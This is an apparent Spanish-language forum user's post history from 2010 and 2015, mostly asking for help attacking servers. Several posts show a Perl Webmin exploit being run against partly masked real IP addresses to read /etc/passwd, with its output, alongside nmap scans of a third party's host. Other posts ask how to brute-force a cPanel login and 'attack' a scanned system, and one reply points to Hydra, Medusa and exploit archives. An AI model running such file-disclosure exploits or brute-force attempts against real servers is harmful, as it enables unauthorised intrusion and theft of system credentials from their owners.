|
Mostrar Mensajes
|
Páginas: [1]
|
1
|
Seguridad Informática / Wireless en Linux / Re: Liberada wifislax-4.11 version final
|
en: 20 Julio 2015, 22:45 pm
|
Pregunta desde la ignorancia, se puede actualizar desde una versión previa instalada en HD? Creo que no, pero está en los planes algún día poder hacerlo o es un imposible? //edit; me tomé el atrevimiento de subirlo a mega por si alguien quiere aprovecharlo, si no se puede lo pueden borrar, no hay problemas. https://mega.co.nz/#!ChQnHRyJ!4WerH-OcmbtfPu3d0cI3ojUSZgI_G1qaxy-ZIr9v7D8
|
|
|
2
|
Seguridad Informática / Hacking / Re: Curiosidad con proxychains
|
en: 6 Julio 2010, 21:56 pm
|
De tanto leer el tema me terminó interesando y me puse a leer sobre como dejar andando tor + polipo. Y éste tutorial con precisamente el fichero que se adjunta (polipo.conf) me sirvió. Ahora quiero dejar funcionando proxychains con namp también.
|
|
|
3
|
Seguridad Informática / Hacking / Re: webmin attack error
|
en: 6 Julio 2010, 19:24 pm
|
[nube@GNU webmin]$ perl 2017.pl 2**.45.*.* 10000 /etc/passwd 0 WEBMIN EXPLOIT !!!!! coded by UmZ! Comments and Suggestions are welcome at umz32.dll [at] gmail.com Vulnerability disclose at securitydot.net I am just coding it in perl 'cuz I hate PHP! Attacking 2**.45.4*.** on port 10000! FILENAME: /etc/passwd
FILE CONTENT STARTED ----------------------------------- <h1>Error - Bad Request</h1> <pre>This web server is running in SSL mode. Try the URL <a href='https://server1.l***.**.**:10000/'>https://server1.***.**.**:10000/</a> instead.<br></pre>
-------------------------------------
|
|
|
4
|
Seguridad Informática / Hacking / Re: webmin attack error
|
en: 6 Julio 2010, 16:57 pm
|
antes que nada gracias a todos. Si ejecuto el exploit en base a la IP recibo un: [nube@GNU webmin]$ perl 2017.pl 2**.4*.44.** 10000 /etc/passwd 1 WEBMIN EXPLOIT !!!!! coded by UmZ! Comments and Suggestions are welcome at umz32.dll [at] gmail.com Vulnerability disclose at securitydot.net I am just coding it in perl 'cuz I hate PHP! Attacking 2**.4*.44.** on port 10000! FILENAME: /etc/passwd Failed: 404 File not found Por otro lado usaba la dirección completa porque es la cual desde donde se loguea el webmin. En mi caso: https://server1.la****.***.ar:10000/ saludos
|
|
|
5
|
Seguridad Informática / Hacking / webmin attack error
|
en: 6 Julio 2010, 05:15 am
|
hola, estoy probando un exploit para webmin que cuando lo ejecuto recibo el siguiente error. [nube@GNU webmin]$ perl 2017.pl https://server.xxxxxxx.xxxx 10000 /etc/passwd 1 WEBMIN EXPLOIT !!!!! coded by UmZ! Comments and Suggestions are welcome at umz32.dll [at] gmail.com Vulnerability disclose at securitydot.net I am just coding it in perl 'cuz I hate PHP! Attacking https://server.xxxxxxxxx.xxxx on port 10000! FILENAME: /etc/passwd Failed: 500 Can't connect to https::443 (Bad hostname 'https:') nmap quick scan plusStarting Nmap 5.21 ( http://nmap.org ) at 2010-07-06 00:10 ART
Nmap scan report for www.xxxxxxxxxxx.xxx (2**.45.xx.**) Host is up (0.32s latency). rDNS record for 2**.45.**: server.xxxxxxxxxx.xxxx Not shown: 92 filtered ports PORT STATE SERVICE VERSION 21/tcp closed ftp 22/tcp closed ssh 53/tcp open domain ISC BIND 9.5.0-P1 80/tcp open http Apache httpd 2.2.8 ((Fedora)) 110/tcp open pop3 Dovecot pop3d 143/tcp open imap Dovecot imapd 873/tcp closed rsync 10000/tcp open http MiniServ 0.01 (Webmin httpd)
Device type: general purpose|firewall|proxy server|WAP Running (JUST GUESSING) : Linux 2.6.X|2.4.X (93%), ISS Linux 2.4.X (92%), Cisco Linux 2.6.X (88%), Riverbed embedded (88%), AVM embedded (87%), Netgear embedded (87%), Linksys embedded (87%) Aggressive OS guesses: Blue Coat Director (Linux 2.6.10) (93%), Linux 2.6.18 (93%), Linux 2.6.5 (93%), Linux 2.6.9 - 2.6.27 (92%), ISS Proventia GX3002 firewall (Linux 2.4.18) (92%), Linux 2.6.9 (89%), Linux 2.4.20 (88%), Linux 2.6.18 - 2.6.28 (88%), Linux 2.6.24 (88%), Linux 2.6.29 (88%) No exact OS matches for host (test conditions non-ideal). Y no sé como demonios avanzar. Ya instalé las librerías p erl-crypt-ssleay y perl-net-ssleay y no sé que me puede estar faltando. Desde ya agradezco cualquier ayuda.
|
|
|
7
|
Seguridad Informática / Hacking / Re: Dudas, primeros pasos, me aconsejan?
|
en: 3 Julio 2010, 14:43 pm
|
esto es un foro de hacking ético. entrar a un sistema para hacer desastres no es nada ético.
no, no no quiero romper nada, en serio, solo quiero aprender. Alomejor es su propio servidor web, puede que este probando eso en una red cerrada. exacto, estamos comprobando la seguridad de la red de un amigo. Para web forms como ese que sugieres, puedes atacar con bruter-force, mira por Hydra o Medusa, sin embargo ese método es muy escandaloso y no es muy ecomendado no mas que en contadas ocasiones, lo suyo es mirar por alguna vulnerabilidad web de dicha aplicación, y buscar el exploit correspondiente.
milw0rm será tu consejero en estas ocasiones. agradezco tu aporte, aunque milw0rm está caído? :s
|
|
|
8
|
Seguridad Informática / Hacking / Dudas, primeros pasos, me aconsejan?
|
en: 3 Julio 2010, 02:07 am
|
hola a todos, soy nuevo aca y me registre porque me pico el bichito de la seguridad. El tema es el siguiente, escanié una determinada IP y su direccion me pide login de cpanel. ***.direccion.com/controlpanel hay manera de forzar un login o algo? ¿o estoy equivocando el camino?Un scan de nmap además me arroja estos resultados. Starting Nmap 5.21 ( http://nmap.org ) at 2010-07-02 18:55 ART RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 RTTVAR has grown to over 2.3 seconds, decreasing to 2.0 Nmap scan report for www.xxxxxxxxxxxxxxxx.com **.120.**.251) Host is up (0.19s latency). rDNS record for **.120.**.251: fb.e9.78ae.static.th********** Not shown: 976 closed ports PORT STATE SERVICE 1/tcp filtered tcpmux 3/tcp filtered compressnet 4/tcp filtered unknown 6/tcp filtered unknown 7/tcp filtered echo 9/tcp filtered discard 13/tcp filtered daytime 17/tcp filtered qotd 19/tcp filtered chargen 21/tcp open ftp 22/tcp filtered ssh 25/tcp filtered smtp 26/tcp open rsftp 53/tcp open domain 80/tcp open http 110/tcp open pop3 143/tcp open imap 443/tcp open https 465/tcp open smtps 646/tcp filtered ldp 993/tcp open imaps 995/tcp open pop3s 2222/tcp open unknown 3306/tcp open mysql Device type: WAP Running: Linux 2.4.X OS details: DD-WRT v23 (Linux 2.4.36)
perdon por la pregunta, pero como "ataco" el sistema de alguna manera, me ayudan? saludos y grazias
|
|
|
|
|
|
|